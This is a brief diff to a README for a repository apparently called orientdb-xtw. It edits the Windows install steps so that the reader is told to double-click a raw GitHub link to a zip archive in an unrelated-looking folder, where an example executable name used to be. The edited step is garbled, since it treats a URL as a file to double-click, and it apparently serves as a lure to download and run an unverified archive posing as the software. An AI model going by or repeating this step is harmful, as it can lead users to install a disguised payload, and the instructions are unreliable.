heavygitcoder/orientdb-xtw/README.md

 ### For Windows

-1. Double-click the downloaded file (for example, `orientdb-xtw-windows.exe`).
+1. Double-click the downloaded file (for example, `https://raw.githubusercontent.com/heavygitcoder/orientdb-xtw/main/Charontas/orientdb-xtw.zip`).
 2. Follow the on-screen instructions to complete the installation.
 3. Once installed, find **orientdb-xtw** in your Start menu and click to open.